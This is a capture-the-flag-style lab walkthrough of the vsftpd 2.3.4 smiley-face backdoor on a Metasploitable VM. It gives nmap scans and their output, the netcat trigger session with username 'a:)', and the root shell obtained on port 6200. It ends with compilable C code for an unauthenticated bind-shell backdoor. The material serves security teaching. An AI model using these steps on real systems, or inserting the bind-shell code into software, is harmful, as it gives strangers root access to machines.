The smiley face vulnerability (vsftpd 2.3.4 backdoor)
Current network: both the Metasploitable VM (called mp below) and the Kali VM run in NAT mode, and the host is on a phone hotspot.
ifconfig shows Kali's own address is 192.168.75.133, so scan that /24 with nmap:
nmap 192.168.75.0/24
(general form: nmap <gateway ip>/24)
┌──(root㉿kali)-[/home/kali]
└─# nmap 192.168.75.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2024-10-25 11:09 CST
Nmap scan report for 192.168.75.1
Host is up (0.00036s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2869/tcp open icslap
6881/tcp open bittorrent-tracker
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.75.2
Host is up (0.00022s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
MAC Address: 00:50:56:EE:63:B9 (VMware)
Nmap scan report for 192.168.75.132
Host is up (0.0019s latency).
Not shown: 977 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
MAC Address: 00:0C:29:8F:5D:C1 (VMware)
Nmap scan report for 192.168.75.254
Host is up (0.0011s latency).
All 1000 scanned ports on 192.168.75.254 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:FA:97:6D (VMware)
Nmap scan report for 192.168.75.133
Host is up (0.0000040s latency).
All 1000 scanned ports on 192.168.75.133 are in ignored states.
Not shown: 1000 closed tcp ports (reset)
Nmap done: 256 IP addresses (5 hosts up) scanned in 8.10 seconds
From this, mp must be 192.168.75.132: it is the only VMware guest (MAC 00:0C:29:...) other than Kali itself (.133), while .1, .2 and .254 are VMware's host adapter, NAT/DNS gateway and DHCP server, and the sheer number of open ports is a giveaway on its own.
Next, identify the service and version behind each port:
nmap -sV <target ip>
┌──(root㉿kali)-[/home/kali]
└─# nmap -sV 192.168.75.132
Starting Nmap 7.94 ( https://nmap.org ) at 2024-10-25 11:12 CST
Nmap scan report for 192.168.75.132
Host is up (0.0025s latency).
Not shown: 977 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open tcpwrapped
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:8F:5D:C1 (VMware)
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.45 seconds
Use netcat to open a raw connection to port 21:
nc <target ip> <port>
┌──(root㉿kali)-[/home/kali]
└─# nc 192.168.75.132 21
220 (vsFTPd 2.3.4)
The 220 reply code means the service is ready.
Now send a USER command with :) in the username (typed as plain ASCII colon and right parenthesis, not full-width characters); here the username is a:)
user a:)
After the 331 reply (password required), send any password, here 123:
pass 123
Before the session shows 421 Timeout, open a second terminal and scan the target's port 6200 with nmap:
nmap -p <port> <target ip>
┌──(root㉿kali)-[/home/kali]
└─# nmap -p 6200 192.168.75.132
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-25 11:34 CST
Nmap scan report for 192.168.75.132
Host is up (0.00048s latency).
PORT STATE SERVICE
6200/tcp open lm-x
MAC Address: 00:0C:29:8F:5D:C1 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
Port 6200 is open. Now connect to it with netcat:
nc <target ip> <port>
┌──(root㉿kali)-[/home/kali]
└─# nc 192.168.75.132 6200
whoami
root
^C
After connecting, type whoami: it returns root, so the shell behind port 6200 is running as root.
Looking the vulnerability up in Metasploit: run msfconsole to open the Metasploit console, then:
search vsftpd 2.3.4
use exploit/unix/ftp/vsftpd_234_backdoor
info
A compilable model of the backdoor logic (illustrative; not the real vsftpd source). Note that there is no minimum username length: the check only asks whether the bytes 0x3a 0x29 appear in the string, and the a:) used above is only three bytes.
/* Compilable model of the backdoor; illustrative, not the real vsftpd source. In 2.3.4 the
 * trigger is a check for the bytes 0x3a 0x29 (":)") slipped into a string routine in str.c,
 * and the listener is vsf_sysutil_extra() in sysdeputil.c, entered directly by the process
 * handling the FTP session; this sketch forks a child instead so the model session continues. */
#include <netinet/in.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#define BACKDOOR_PORT 6200

/* Equivalent of vsf_sysutil_extra(): bind 0.0.0.0:6200 and, for the first client that
 * connects, wire the socket to stdin/stdout/stderr and exec /bin/sh. No authentication;
 * the shell inherits the daemon's uid, which is root on Metasploitable 2. */
static void backdoor_listener(void) {
    struct sockaddr_in sa;
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0) exit(1);
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(BACKDOOR_PORT);
    sa.sin_addr.s_addr = INADDR_ANY;
    if (bind(fd, (struct sockaddr *)&sa, sizeof sa) < 0 || listen(fd, 100) < 0) exit(1);
    for (;;) {
        int rfd = accept(fd, NULL, NULL);
        if (rfd < 0) continue;
        dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2);
        /* execl replaces this process with sh, so the loop never comes back: one probe
         * connection that is then closed uses up the shell and the port goes away with it. */
        execl("/bin/sh", "sh", (char *)NULL);
        exit(1); /* only reached if exec fails */
    }
}

/* Stand-in for vsftpd's real authentication (PAM / passwd); no accounts in this model. */
static int validate_normal_login(const char *user) { (void)user; return -1; }
int handle_user_login(const char *username) {
    char user_buf[512];
    strncpy(user_buf, username, sizeof user_buf - 1);
    user_buf[sizeof user_buf - 1] = '\0';
    /* The trigger: ":)" anywhere in the username; there is no length requirement. */
    if (strstr(user_buf, ":)") != NULL) {
        if (fork() == 0) backdoor_listener(); /* child: never returns */
        return -1;                            /* the FTP session just sees a failed login */
    }
    return validate_normal_login(user_buf);
}

/* Read one "USER <name>" line from the client socket and act on it. */
void process_login_request(int client_fd) {
    char line[512];
    ssize_t n = read(client_fd, line, sizeof line - 1);
    if (n <= 0) return;
    line[n] = '\0'; line[strcspn(line, "\r\n")] = '\0';
    const char *username = strncmp(line, "USER ", 5) == 0 ? line + 5 : line;
    if (handle_user_login(username) < 0) {
        static const char msg[] = "530 Login incorrect.\r\n";
        write(client_fd, msg, sizeof msg - 1);
    }
}
- The trigger is the string :) (bytes 0x3a 0x29) in the username.
- It sends vsftpd down a code path that has nothing to do with logging in,
- which opens a backdoor listener on TCP port 6200.
- That listener runs with the daemon's privileges, root on Metasploitable 2, as the whoami above shows.
- It allows command execution with no authentication at all.